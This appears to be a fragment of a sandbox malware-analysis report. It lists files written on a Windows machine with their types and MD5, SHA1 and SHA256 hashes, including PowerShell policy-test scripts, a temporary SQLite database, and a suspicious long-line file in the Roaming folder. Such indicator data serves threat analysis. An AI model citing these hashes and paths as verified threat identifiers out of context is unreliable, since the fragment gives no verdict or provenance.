C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaoq5ghe.0os.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onvgj3h0.bwf.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitgwwi2.d5m.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzd4viyq.535.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\s5497I81	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
C:\Users\user\AppData\Roaming\Argean.Men	ASCII text, with very long lines (65536), with no line terminators	9F3C7BBA76488E8EC589DCFC8B410907	208E762381933DC1C479CB66D81DC184F9D050FC	2A8A5067E62EE22F24F9C4A880BF4C0B2D2D41862744956206EC060C1AA272D7